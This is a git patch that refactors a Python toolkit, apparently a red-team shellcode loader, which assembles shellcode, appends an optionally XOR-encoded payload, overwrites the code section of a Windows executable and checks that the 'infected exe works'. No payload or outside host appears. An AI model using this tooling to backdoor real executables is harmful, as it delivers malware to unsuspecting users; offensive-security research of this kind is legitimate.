From 7d6e726fab30a6ad78e4b1489fd2a565d1413b2c Mon Sep 17 00:00:00 2001 From: Dobin Date: Fri, 16 Feb 2024 08:34:46 +0000 Subject: [PATCH] refactor: bix cleanup --- defs.py | 30 ++++++++++++++++ helper.py | 84 +++++---------------------------------------- model.py | 34 ++---------------- pehelper.py | 58 ++++++++++++++++++------------- phases/assembler.py | 29 +++++++--------- phases/compiler.py | 7 ++-- phases/injector.py | 9 ++--- project.py | 5 ++- supermega.py | 36 +++++++++++-------- 9 files changed, 125 insertions(+), 167 deletions(-) create mode 100644 defs.py diff --git a/defs.py b/defs.py new file mode 100644 index 0000000..483993f --- /dev/null +++ b/defs.py @@ -0,0 +1,30 @@ +from enum import Enum + + +class FilePath(str): + pass + + +class AllocStyle(Enum): + RWX = "rwx_1" + #RW_X = "rw_x" + #REUSE = "reuse" + +class ExecStyle(Enum): + CALL = "direct_1", + #JMP = 2, + #FIBER = 3, + +class DecoderStyle(Enum): + PLAIN_1 = "plain_1" + XOR_1 = "xor_1" + +class DataRefStyle(Enum): + APPEND = 1 + +#class InjectStyle(Enum): + +class SourceStyle(Enum): + peb_walk = 1 + iat_reuse = 2 + diff --git a/helper.py b/helper.py index 9807c60..d710d1f 100644 --- a/helper.py +++ b/helper.py @@ -1,84 +1,18 @@ import subprocess import os -import time -import shutil import pathlib -import sys -import pefile import glob import logging from config import config from project import project -from pehelper import * +from defs import * logger = logging.getLogger("Helper") SHC_VERIFY_SLEEP = 0.1 -verify_filename = r'C:\Temp\a' -build_dir = "build" - - -def remove_trailing_null_bytes(data): - for i in range(len(data) - 1, -1, -1): - if data[i] != b'\x00'[0]: # Check for a non-null byte - return data[:i + 1] - return b'' # If the entire sequence is null bytes - - -def get_code_section_data(pe_file): - try: - # Load the PE file - pe = pefile.PE(pe_file) - - # Iterate over the sections - #for section in pe.sections: - # # Check if this is the code section - # if '.text' in section.Name.decode().rstrip('\x00'): - # data = section.get_data() - # data = remove_trailing_null_bytes(data) - # logger.info(" > 0x{:X} Code Size: {} (raw code section size: {})".format( - # section.VirtualAddress, - # len(data), section.SizeOfRawData)) - # return data - - section = get_code_section(pe) - if section == None: - raise Exception("Code section not found.") - - logger.info("--[ Code section: {}".format(section.Name.decode().rstrip('\x00'))) - data = section.get_data() - data = remove_trailing_null_bytes(data) - logger.info(" > 0x{:X} Code Size: {} (raw code section size: {})".format( - section.VirtualAddress, - len(data), section.SizeOfRawData)) - return data - - except FileNotFoundError: - logger.info(f"File not found: {pe_file}") - except pefile.PEFormatError: - logger.info(f"Invalid PE file: {pe_file}") - - -def write_code_section(pe_file, new_data): - # Load the PE file - pe = pefile.PE(pe_file) - - # Iterate over the sections - for section in pe.sections: - # Check if this is the code section - if '.text' in section.Name.decode().rstrip('\x00'): - file_offset = section.PointerToRawData - - with open(pe_file, 'r+b') as f: - f.seek(file_offset) - f.write(new_data) - #logger.info("Successfully overwritten the .text section with new data.") - break - - def clean_files(): logger.info("--[ Remove old files") @@ -89,13 +23,13 @@ def clean_files(): "mllink$.lnk", # out/ stuff - os.path.join(build_dir, "main.asm"), - os.path.join(build_dir, "main.bin"), - os.path.join(build_dir, "main.c"), - os.path.join(build_dir, "peb_lookup.h"), - #os.path.join(build_dir, "main.exe"), + os.path.join(project.build_dir, "main.asm"), + os.path.join(project.build_dir, "main.bin"), + os.path.join(project.build_dir, "main.c"), + os.path.join(project.build_dir, "peb_lookup.h"), + #os.path.join(project.build_dir, "main.exe"), - verify_filename, + project.verify_filename, ] for file in files_to_clean: pathlib.Path(file).unlink(missing_ok=True) @@ -133,7 +67,7 @@ def try_start_shellcode(shc_file): subprocess.run([ config.get["path_runshc"], shc_file, - ]) # , check=True + ]) def file_readall_text(filepath) -> str: @@ -155,4 +89,4 @@ def delete_all_files_in_directory(directory_path): os.remove(file_path) #logger.info(f"Deleted {file_path}") except Exception as e: - logger.info(f"Error deleting {file_path}: {e}") \ No newline at end of file + logger.info(f"Error deleting {file_path}: {e}") diff --git a/model.py b/model.py index 2481c46..fc80770 100644 --- a/model.py +++ b/model.py @@ -1,40 +1,12 @@ from typing import Dict -import pehelper -import pefile -from enum import Enum import logging +import pefile + +import pehelper logger = logging.getLogger("Model") -class FilePath(str): - pass - - -class AllocStyle(Enum): - RWX = "rwx_1" - #RW_X = "rw_x" - #REUSE = "reuse" - -class ExecStyle(Enum): - CALL = "direct_1", - #JMP = 2, - #FIBER = 3, - -class DecoderStyle(Enum): - PLAIN_1 = "plain_1" - XOR_1 = "xor_1" - -class DataRefStyle(Enum): - APPEND = 1 - -#class InjectStyle(Enum): - -class SourceStyle(Enum): - peb_walk = 1 - iat_reuse = 2 - - class Capability(): def __init__(self, name): self.name = name diff --git a/pehelper.py b/pehelper.py index 5ffb1af..3819415 100644 --- a/pehelper.py +++ b/pehelper.py @@ -5,38 +5,50 @@ from keystone import Ks, KS_ARCH_X86, KS_MODE_64 from capstone import Cs, CS_ARCH_X86, CS_MODE_64 import logging +from model import * +from helper import * + logger = logging.getLogger("PEHelper") -def get_code_section(pe): +def extract_code_from_exe(exe_file: FilePath) -> bytes: + pe = pefile.PE(exe_file) + section = get_code_section(pe) + logger.info("--[ Code section: {}".format(section.Name.decode().rstrip('\x00'))) + data: bytes = section.get_data() + data = remove_trailing_null_bytes(data) + logger.info(" > 0x{:X} Code Size: {} (raw code section size: {})".format( + section.VirtualAddress, + len(data), section.SizeOfRawData)) + return data + + +def write_code_section(exe_file: FilePath, new_data: bytes): + pe = pefile.PE(exe_file) + section = get_code_section(pe) + file_offset = section.PointerToRawData + with open(exe_file, 'r+b') as f: + f.seek(file_offset) + f.write(new_data) + + +def get_code_section(pe) -> pefile.SectionStructure: entrypoint = pe.OPTIONAL_HEADER.AddressOfEntryPoint - for sect in pe.sections: - name = sect.Name.decode() - #logger.info("Checking: {} and 0x{:x}".format(name, sect.Characteristics)) - if sect.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']: if entrypoint >= sect.VirtualAddress and entrypoint <= sect.VirtualAddress + sect.SizeOfRawData: return sect - #else: - # logger.info("NOOO: 0x{:x} 0x{:x} 0x{:x}".format( - # entrypoint, - # sect.VirtualAddress, - # sect.VirtualAddress + sect.SizeOfRawData, - # )) - - return None + raise Exception("Code section not found") # RWX -def get_rwx_section(pe): +def get_rwx_section(pe: pefile.PE) -> pefile.SectionStructure: entrypoint = pe.OPTIONAL_HEADER.AddressOfEntryPoint for section in pe.sections: if (section.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_READ'] and section.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_WRITE'] and section.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE'] ): - #name = section.Name.decode().rstrip('\x00') if entrypoint > section.VirtualAddress and entrypoint < section.VirtualAddress + section.SizeOfRawData: return section return None @@ -44,7 +56,7 @@ def get_rwx_section(pe): # keystone/capstone stuff -def assemble_and_disassemble_jump(current_address, destination_address): +def assemble_and_disassemble_jump(current_address: int, destination_address: int) -> bytes: #logger.info(" Make jmp from 0x{:X} to 0x{:X}".format( # current_address, destination_address #)) @@ -67,7 +79,7 @@ def assemble_and_disassemble_jump(current_address, destination_address): # IAT Stuff -def extract_iat(pe): +def extract_iat(pe: pefile.PE): iat = {} # If the PE file was loaded using the fast_load=True argument, we will need to parse the data directories: @@ -109,10 +121,10 @@ def resolve_iat_capabilities(needed_capabilities, inject_exe): cap.addr = get_addr_for(iat, cap.name) -def main(): - pe = pefile.PE(sys.argv[1]) - iat = extract_iat(pe) +## Utils - -if __name__ == "__main__": - main() \ No newline at end of file +def remove_trailing_null_bytes(data: bytes) -> bytes: + for i in range(len(data) - 1, -1, -1): + if data[i] != b'\x00'[0]: # Check for a non-null byte + return data[:i + 1] + return b'' # If the entire sequence is null bytes diff --git a/phases/assembler.py b/phases/assembler.py index 9433959..4e2b075 100644 --- a/phases/assembler.py +++ b/phases/assembler.py @@ -8,37 +8,34 @@ from config import config from observer import observer from project import project from helper import * +from pehelper import * logger = logging.getLogger("Assembler") -def make_shc_from_asm(asm_file, exe_file, shc_file): - logger.info("--[ Assemble to exe: {} -> {} -> {}".format(asm_file, exe_file, shc_file)) - logger.info("---[ Assemble ASM to EXE: {} -> {}".format(asm_file, exe_file)) +def asm_to_shellcode(asm_in: FilePath, build_exe: FilePath, shellcode_out: FilePath): + """Takes ASM source file asm_in, compiles it into build_exe, extracts its code section and write into shellcode_out""" + logger.info("--[ Assemble to exe: {} -> {} -> {}".format(asm_in, build_exe, shellcode_out)) run_process_checkret([ config.get("path_ml64"), - asm_file, + asm_in, "/link", - "/OUT:{}".format(exe_file), + "/OUT:{}".format(build_exe), "/entry:AlignRSP" ]) - if not os.path.isfile(exe_file): + if not os.path.isfile(build_exe): logger.error("Error") return - - logger.info("---[ EXE to SHC: {} -> {} ".format(exe_file, shc_file)) - code = get_code_section_data(exe_file) - with open(shc_file, 'wb') as f: + code = extract_code_from_exe(build_exe) + with open(shellcode_out, 'wb') as f: f.write(code) - return code - #logger.info("---[ Shellcode from {} written to: {} (size: {}) ".format(exe_file, shc_file, len(code))) -def merge_loader_payload(main_shc_file): +def merge_loader_payload(shellcode_in: FilePath, shellcode_out: FilePath, payload: FilePath, decoder_style: DecoderStyle): logger.info("--[ Merge stager: {} + {} -> {}".format( - main_shc_file, project.payload, main_shc_file)) - with open(main_shc_file, 'rb') as input1: + shellcode_in, project.payload, shellcode_out)) + with open(shellcode_in, 'rb') as input1: data_stager = input1.read() with open(project.payload, 'rb') as input2: data_payload = input2.read() @@ -53,7 +50,7 @@ def merge_loader_payload(main_shc_file): logger.info("---[ Size: Stager: {} and Payload: {} Sum: {} ".format( len(data_stager), len(data_payload), len(data_stager)+len(data_payload))) - with open(main_shc_file, 'wb') as output: + with open(shellcode_out, 'wb') as output: data = data_stager + data_payload output.write(data) observer.add_code("final_shellcode", data) diff --git a/phases/compiler.py b/phases/compiler.py index 4339e20..559fee6 100644 --- a/phases/compiler.py +++ b/phases/compiler.py @@ -1,10 +1,11 @@ -from helper import * -from config import config import os import pprint -from observer import observer import logging +import shutil +from helper import * +from config import config +from observer import observer from project import project from model import * diff --git a/phases/injector.py b/phases/injector.py index 86cedd6..b5db46c 100644 --- a/phases/injector.py +++ b/phases/injector.py @@ -2,6 +2,7 @@ from helper import * import shutil import pprint import logging +import time from pehelper import * from model import * @@ -36,7 +37,7 @@ def inject_exe(shc_file: FilePath): # and re-implant it if project.source_style == SourceStyle.iat_reuse: # get code section of exe_out - code = get_code_section_data(exe_out) + code = extract_code_from_exe(exe_out) for cap in exe_capabilities.get_all().values(): if not cap.id in code: logger.error("Capability ID {} not found, abort".format(cap.id)) @@ -58,16 +59,16 @@ def inject_exe(shc_file: FilePath): def verify_injected_exe(exefile): logger.info("---[ Verify infected exe: {} ".format(exefile)) # remove indicator file - pathlib.Path(verify_filename).unlink(missing_ok=True) + pathlib.Path(project.verify_filename).unlink(missing_ok=True) run_process_checkret([ exefile, ], check=False) time.sleep(SHC_VERIFY_SLEEP) - if os.path.isfile(verify_filename): + if os.path.isfile(project.verify_filename): logger.info("---> Verify OK. Infected exe works (file was created)") # better to remove it immediately - os.remove(verify_filename) + os.remove(project.verify_filename) return True else: logger.error("---> Verify FAIL. Infected exe does not work (no file created)") diff --git a/project.py b/project.py index b2c931a..18c14f4 100644 --- a/project.py +++ b/project.py @@ -1,5 +1,5 @@ from model import * - +from defs import * class Project(): def __init__(self): @@ -32,5 +32,8 @@ class Project(): self.generate_asm_from_c: bool = True self.generate_shc_from_asm: bool = True + self.verify_filename = r'C:\Temp\a' + self.build_dir = "build" + project = Project() diff --git a/supermega.py b/supermega.py index 703d98e..1900d6e 100644 --- a/supermega.py +++ b/supermega.py @@ -1,14 +1,15 @@ import shutil from enum import Enum -from helper import * import argparse from typing import Dict -import pickle +import os import logging +import time +from defs import * from model import * +from helper import * from config import config -from pehelper import * import phases.templater import phases.compiler import phases.assembler @@ -16,10 +17,10 @@ import phases.injector from observer import observer from project import project -main_c_file = os.path.join(build_dir, "main.c") -main_asm_file = os.path.join(build_dir, "main.asm") -main_exe_file = os.path.join(build_dir, "main.exe") -main_shc_file = os.path.join(build_dir, "main.bin") +main_c_file = os.path.join(project.build_dir, "main.c") +main_asm_file = os.path.join(project.build_dir, "main.asm") +main_exe_file = os.path.join(project.build_dir, "main.exe") +main_shc_file = os.path.join(project.build_dir, "main.bin") # ANSI escape sequences for colors @@ -178,7 +179,10 @@ def start(): # Convert: ASM -> Shellcode if project.generate_shc_from_asm: - code = phases.assembler.make_shc_from_asm(main_asm_file, main_exe_file, main_shc_file) + code = phases.assembler.asm_to_shellcode( + asm_in = main_asm_file, + build_exe = main_exe_file, + shellcode_out = main_shc_file) observer.add_code("generate_shc_from_asm", code) # Try: Starting the shellcode (rarely useful) @@ -187,7 +191,11 @@ def start(): # Merge shellcode/loader with payload if project.dataref_style == DataRefStyle.APPEND: - phases.assembler.merge_loader_payload(main_shc_file) + phases.assembler.merge_loader_payload( + shellcode_in = main_shc_file, + shellcode_out = main_shc_file, + payload = project.payload, + decoder_style = project.decoder_style) if project.verify and project.source_style == SourceStyle.peb_walk: logger.info("--[ Verify final shellcode") @@ -275,21 +283,21 @@ def verify_shellcode(shc_name): logger.info("---[ Verify shellcode: {}".format(shc_name)) # check if directory exists - if not os.path.exists(os.path.dirname(verify_filename)): - logger.info("Error, directory does not exist for: {}".format(verify_filename)) + if not os.path.exists(os.path.dirname(project.verify_filename)): + logger.info("Error, directory does not exist for: {}".format(project.verify_filename)) return # remove indicator file - pathlib.Path(verify_filename).unlink(missing_ok=True) + pathlib.Path(project.verify_filename).unlink(missing_ok=True) run_process_checkret([ config.get("path_runshc"), "{}".format(shc_name), ], check=False) time.sleep(SHC_VERIFY_SLEEP) - if os.path.isfile(verify_filename): + if os.path.isfile(project.verify_filename): logger.info("---> Verify OK. Shellcode works (file was created)") - os.remove(verify_filename) + os.remove(project.verify_filename) return True else: logger.info("---> Verify FAIL. Shellcode doesnt work (file was not created)")